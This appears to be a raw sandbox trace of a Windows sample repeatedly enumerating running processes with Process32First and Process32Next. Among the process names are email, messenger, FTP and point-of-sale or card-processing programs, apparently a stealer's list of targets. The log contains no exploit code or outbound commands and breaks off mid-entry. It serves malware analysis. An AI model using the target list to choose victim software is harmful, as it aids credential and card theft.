Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0235.062] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0235.064] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0235.065] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0235.067] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0235.069] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0235.070] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0235.072] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0235.076] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0235.078] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0235.079] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0235.081] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0235.083] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0235.084] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0235.086] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0235.088] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0235.140] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0235.142] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0235.144] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0235.145] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0235.147] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0235.148] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0235.150] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0235.154] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0235.156] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0235.157] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0235.159] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0235.160] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0235.162] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0235.163] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0235.165] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0235.167] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0235.171] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0235.173] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0235.174] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0235.176] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0235.177] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0235.179] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0235.180] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0235.181] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.216] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0235.217] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.219] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0235.220] CloseHandle (hObject=0x1018) returned 1 [0235.220] Sleep (dwMilliseconds=0x64) [0235.454] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0235.468] Process32First (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.469] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0235.470] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0235.472] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.473] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0235.474] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.476] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0235.477] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0235.478] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0235.482] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.484] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.485] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0235.486] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.488] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.489] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.490] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.492] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.493] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.494] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.505] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0235.506] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0235.508] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0235.509] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.513] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.515] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0235.517] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0235.519] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0235.520] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0235.522] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.523] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0235.524] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.526] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.529] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.531] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0235.532] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0235.533] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0235.534] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0235.536] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0235.537] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0235.538] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0235.540] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, 